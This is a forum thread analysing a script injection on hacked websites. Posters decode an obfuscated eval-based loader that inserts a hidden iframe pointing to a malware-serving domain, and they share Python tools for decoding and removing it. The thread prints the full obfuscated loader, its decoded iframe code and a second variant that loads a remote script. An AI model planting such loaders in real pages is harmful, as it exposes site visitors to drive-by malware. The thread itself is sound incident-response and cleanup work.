Hacked

tec ::

A couple of pages fell victim to a script injection, and I'm just wondering whether anyone has a clue what the code below does... at least roughly.

Thanks

AndyS ::

We can't even copy-paste it to look at what it actually does, or to deobfuscate it. The numbers are probably ASCII codes of some other code; maybe the whole thing is shifted by a few characters. In any case some new code gets built; for anything more, paste it or give a link to a text version of it.

stb ::

Code:
<!--a6f227--><script type="text/javascript" language="javascript">if(021===0x11)v="va"+"l";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array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}w=f;s=[];r=String;for(i=0;-i+412!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCh"+"arC"+((020===0x10)?"ode":"")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+"");}</script><!--/a6f227-->


or, beautified with http://jsbeautifier.org/ (comments added to explain each stage):
// 021 is octal 17 and 0x11 is 17, so this always runs: v = "val"
if (021 === 0x11) v = "va" + "l";
try {
    faweb++                        // undefined identifier -> ReferenceError
} catch (btawetb) {
    try {
        fve ^ v                    // undefined identifier -> ReferenceError
    } catch (btawt4) {
        try {
            window.document.body = v   // assigning a string to document.body throws in a real browser DOM
        } catch (gdsgsdg) {
            w = window;
            // reached only when all three statements above throw: e = window["eval"]
            // (a naive emulator without a real DOM never gets here and the payload stays encoded)
            if (020 === 0x10) e = w["e".concat(v)];
        }
    }
}
if (1) {
    // the encoded payload: one number per character of the real script
    f = new Array(40, 101, 115, 110, 98, 114, 105, 110, 108, 40, 40, 11, 10, 122, 11, 10, 31, 116, 97, 113, 30, 97, 31, 59, 32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 98, 112, 101, 96, 114, 101, 68, 106, 101, 108, 99, 110, 115, 38, 39, 104, 100, 114, 96, 107, 101, 38, 39, 59, 12, 8, 13, 9, 30, 97, 45, 113, 114, 98, 30, 61, 31, 37, 104, 115, 114, 112, 57, 45, 47, 102, 99, 116, 120, 109, 117, 113, 96, 101, 115, 44, 111, 113, 101, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 111, 109, 115, 104, 114, 105, 110, 108, 32, 60, 30, 39, 96, 96, 115, 110, 106, 117, 115, 99, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 97, 109, 114, 99, 99, 114, 31, 59, 32, 38, 46, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 103, 99, 105, 102, 102, 116, 31, 59, 32, 38, 48, 112, 119, 37, 59, 12, 8, 32, 96, 44, 115, 115, 119, 108, 100, 44, 119, 104, 98, 116, 103, 30, 61, 31, 37, 50, 111, 118, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 107, 99, 102, 115, 30, 61, 31, 37, 49, 111, 118, 39, 58, 11, 10, 31, 95, 46, 114, 114, 121, 107, 99, 46, 115, 109, 112, 31, 59, 32, 38, 47, 112, 119, 37, 59, 12, 8, 13, 9, 30, 105, 101, 38, 33, 99, 109, 99, 116, 107, 101, 109, 114, 46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64, 121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39, 40, 39, 13, 9, 30, 123, 12, 8, 32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 118, 112, 105, 115, 99, 40, 38, 58, 100, 104, 116, 32, 104, 98, 61, 91, 37, 109, 96, 112, 119, 96, 98, 115, 91, 37, 62, 59, 45, 100, 104, 116, 62, 38, 39, 59, 12, 8, 32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64, 121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39, 40, 44, 97, 111, 110, 101, 109, 98, 67, 103, 103, 108, 99, 38, 97, 40, 57, 13, 9, 30, 125, 12, 8, 125, 40, 38, 41, 58, 11, 10);
}
w = f;
s = [];
r = String;
// 412 iterations, one per array element; the real char code is w[j] + j % 3
for (i = 0; - i + 412 != 0; i += 1) {
    j = i;
    if (e && (031 == 0x19)) s = s + r["fromCh" + "arC" + ((020 === 0x10) ? "ode" : "")]((1 * w[j] + j % 3));
}
try {
    (w + s)()      // a string is not callable -> TypeError, so execution falls into the catch
} catch (asga) {
    e(s + "");     // eval(decoded payload)
}


stb ::

From the array it constructs this code:
 var a = document.createElement('iframe');

 a.src = 'http://getyourbet.org';
 a.style.position = 'absolute';
 a.style.border = '0';
 a.style.height = '2px';
 a.style.width = '2px';
 a.style.left = '1px';
 a.style.top = '1px';

 if(!document.getElementById('marwads'))
 {
 document.write('<div id=\'marwads\'></div>');
 document.getElementById('marwads').appendChild(a);
 }

and executes it in the context of the attacked page.
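The decoding step stb describes can be reproduced offline without executing any of the attacker's JavaScript. The script below is an added example, not code from the thread: it pulls the numeric literal out of a `new Array(...)` statement, applies the same `w[j] + j % 3` shift the loader uses, and lists the URLs in the decoded stage as indicators. The array is the one from the beautified post above (412 values); `extract_array`, `decode`, `extract_urls` and `analyse` are this example's own names.

```python
import re

# Static decoder for the loader posted above (added example, not from the thread).
# The obfuscated script effectively does
#     for j in 0..411: s += String.fromCharCode(w[j] + j % 3)
# and then eval(s). This reproduces that step without running any of it.

# Numeric payload copied from the beautified `f = new Array(...)` above (412 values).
ENCODED = [
    40, 101, 115, 110, 98, 114, 105, 110, 108, 40, 40, 11, 10, 122, 11, 10,
    31, 116, 97, 113, 30, 97, 31, 59, 32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 98, 112, 101, 96, 114, 101, 68, 106, 101, 108, 99, 110, 115, 38, 39, 104, 100, 114, 96, 107, 101, 38, 39, 59,
    12, 8, 13, 9,
    30, 97, 45, 113, 114, 98, 30, 61, 31, 37, 104, 115, 114, 112, 57, 45, 47, 102, 99, 116, 120, 109, 117, 113, 96, 101, 115, 44, 111, 113, 101, 39, 58, 11, 10,
    31, 95, 46, 114, 114, 121, 107, 99, 46, 111, 109, 115, 104, 114, 105, 110, 108, 32, 60, 30, 39, 96, 96, 115, 110, 106, 117, 115, 99, 39, 58, 11, 10,
    31, 95, 46, 114, 114, 121, 107, 99, 46, 97, 109, 114, 99, 99, 114, 31, 59, 32, 38, 46, 39, 58, 11, 10,
    31, 95, 46, 114, 114, 121, 107, 99, 46, 103, 99, 105, 102, 102, 116, 31, 59, 32, 38, 48, 112, 119, 37, 59, 12, 8,
    32, 96, 44, 115, 115, 119, 108, 100, 44, 119, 104, 98, 116, 103, 30, 61, 31, 37, 50, 111, 118, 39, 58, 11, 10,
    31, 95, 46, 114, 114, 121, 107, 99, 46, 107, 99, 102, 115, 30, 61, 31, 37, 49, 111, 118, 39, 58, 11, 10,
    31, 95, 46, 114, 114, 121, 107, 99, 46, 115, 109, 112, 31, 59, 32, 38, 47, 112, 119, 37, 59, 12, 8,
    13, 9,
    30, 105, 101, 38, 33, 99, 109, 99, 116, 107, 101, 109, 114, 46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64, 121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39, 40, 39, 13, 9,
    30, 123, 12, 8,
    32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 118, 112, 105, 115, 99, 40, 38, 58, 100, 104, 116, 32, 104, 98, 61, 91, 37, 109, 96, 112, 119, 96, 98, 115, 91, 37, 62, 59, 45, 100, 104, 116, 62, 38, 39, 59, 12, 8,
    32, 99, 109, 99, 116, 107, 101, 109, 114, 46, 102, 99, 116, 68, 106, 101, 108, 99, 110, 115, 64, 121, 72, 98, 40, 38, 107, 97, 113, 117, 97, 99, 113, 39, 40, 44, 97, 111, 110, 101, 109, 98, 67, 103, 103, 108, 99, 38, 97, 40, 57, 13, 9,
    30, 125, 12, 8,
    125, 40, 38, 41, 58, 11, 10,
]

# Matches the numeric `new Array(1, 2, 3)` literal the loader stores its payload in.
ARRAY_RE = re.compile(r"new\s+Array\s*\(\s*([\d\s,]+?)\s*\)")


def extract_array(script_text):
    """Return the integers inside the first numeric `new Array(...)` literal."""
    m = ARRAY_RE.search(script_text)
    if m is None:
        raise ValueError("no numeric new Array(...) literal found")
    return [int(x) for x in m.group(1).split(",") if x.strip()]


def decode(values, modulus=3):
    """Mirror of the loop body `r.fromCharCode(1*w[j] + j%3)` over the whole array."""
    return "".join(chr(v + j % modulus) for j, v in enumerate(values))


def extract_urls(payload):
    """Indicators worth blocking or reporting: every http(s) URL in the decoded stage."""
    return re.findall(r"https?://[A-Za-z0-9.-]+(?:/[^\s'\"<>]*)?", payload)


def analyse(script_text):
    """One shot: obfuscated script text -> (decoded JavaScript, list of URLs)."""
    decoded = decode(extract_array(script_text))
    return decoded, extract_urls(decoded)


if __name__ == "__main__":
    # Rebuild the relevant statement from the array so the whole chain is exercised.
    sample = "f = new Array(" + ", ".join(map(str, ENCODED)) + ");"
    js, urls = analyse(sample)
    print(js)
    print("indicators:", urls)
```

Run it on a copy of the infected page and compare the output with stb's listing above; if a later sample uses a different modulus (the `j % 3` term) or loop length, only `decode`'s `modulus` argument and the array itself change. The URL list is what you hand to your proxy or blocklist; never fetch it from a workstation to "check".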

stb ::

Of course it's not advisable to click the link in the code above, because in some cases (with the right referrer) it reportedly serves malware.
Some more about this attack: http://blog.dynamoo.com/2012/11/getyour...

AndyS ::

Well done stb. Apparently I was about right, I just didn't have the time to deal with it. Thanks!

tec ::

Uff, thanks for this. It helped with cleaning the server.

stb ::

You're welcome. I hope you realise that cleaning the server alone is not enough. You also have to stop the injection from happening again.
This abuse is apparently fairly widespread here: http://www.google.com/search?q=btawetb+...

tec ::

Yes, obviously we have to find the hole. The first thing I did was change all the passwords and remove the FTP program, in case they hijacked my PC and got the FTP credentials that way. That is also what I suspect most, because I can't find any other connection. I have several servers: a CMS runs on some, a forum on some, other custom scripts on others. The odd thing is that they got onto all of the servers except one. That is why I suspected my PC was the source. But it turned out not to be, because after changing all the FTP passwords I shut my PC down over the weekend. This morning everything was infected again. I could understand them injecting into, say, a forum that is open source, but a script we wrote ourselves, whose nature doesn't allow injection (a function for sending mail), is infected too.

So actually I don't even know where to look any more. Any ideas?

Thanks

Ah, in case it's useful to anyone: Text Workbench is a nice tool that has find & replace + regex and can connect over FTP. One site cleaned in five minutes, which is how long the program takes to go through all the files.
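The find-and-replace cleanup tec describes can be scripted so it is repeatable after the next reinfection. This is an added example, not code from the thread or from Text Workbench: it matches the `<!--a6f227-->` ... `<!--/a6f227-->` comment pair that wraps both injected variants posted here, rather than the script body, which changed between them. The sample pages are constructed, cut-down copies of the two variants; `strip_injection` and `clean_tree` are this example's own names.

```python
import re
from pathlib import Path

# Marker-based cleaner for the injected block (added example, not from the thread).
# Both variants posted in this thread sit between the same HTML comment markers,
# so the markers are the stable thing to match: the payload between them changed,
# the markers did not.
MARKER = "a6f227"
INJECT_RE = re.compile(
    r"<!--" + MARKER + r"-->.*?<!--/" + MARKER + r"-->[ \t]*\r?\n?",
    re.DOTALL,
)


def strip_injection(text):
    """Remove every marker block from text. Returns (cleaned_text, blocks_removed)."""
    return INJECT_RE.subn("", text)


def clean_tree(root, suffixes=(".html", ".htm", ".php", ".js", ".tpl")):
    """Rewrite infected files under root in place; returns [(path, blocks_removed)].
    This edits files: run it against a backup or a copy of the web root first."""
    fixed = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        raw = path.read_bytes()
        # surrogateescape keeps non-UTF-8 bytes intact on the round trip
        text = raw.decode("utf-8", errors="surrogateescape")
        cleaned, n = strip_injection(text)
        if n:
            path.write_bytes(cleaned.encode("utf-8", errors="surrogateescape"))
            fixed.append((str(path), n))
    return fixed


# Constructed sample pages, each carrying a cut-down copy of one variant from the thread.
IFRAME_VARIANT = (
    "<html><body><p>content</p>\n"
    "<!--a6f227--><script type=\"text/javascript\" language=\"javascript\">"
    "if(021===0x11)v=\"va\"+\"l\";/* decoder and eval omitted */</script><!--/a6f227-->\n"
    "</body></html>\n"
)
SCRIPT_VARIANT = (
    "<?php /* mailer */ ?>\n"
    "<!--a6f227--><script type=\"text/javascript\" language=\"javascript\" >"
    "var a = document.createElement('script');a.setAttribute('src', \"http://getyourbet.org\");"
    "document.getElementsByTagName('HEAD')[0].appendChild(a);</script><!--/a6f227-->"
)

if __name__ == "__main__":
    for page in (IFRAME_VARIANT, SCRIPT_VARIANT):
        cleaned, n = strip_injection(page)
        print(n, "block(s) removed ->", repr(cleaned))
```

Point `clean_tree` at a local copy of the site (`clean_tree("/srv/www/site")`, path hypothetical) and keep the returned list: the files it touched are exactly the ones whose write path the attacker reached, which is the evidence you need when hunting for how they got in. A marker-based cleaner only removes this campaign's block; it does not close the hole, and a file that is infected again after cleanup is telling you the access path is still open.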

tec ::

And a new version of the virus:

<!--a6f227--><script type="text/javascript" language="javascript" >var a = document.createElement('script');a.setAttribute('type', 'text/javascript');a.setAttribute('src', "http://getyourbet.org");document.getElementsByTagName('HEAD')[0].appendChild(a);</script><!--/a6f227-->

stb ::

I reported the thing today to
http://www.stopbadware.org/reports/b4bf...
from there it will probably go to Google Safe Browsing, and from there via the API into browsers, firewalls, antiviruses...

Btw: while doing that my antivirus detected "JS/Kryptik.AAW trojan":
[image: antivirus warning]

...in case it helps you with the cleanup.

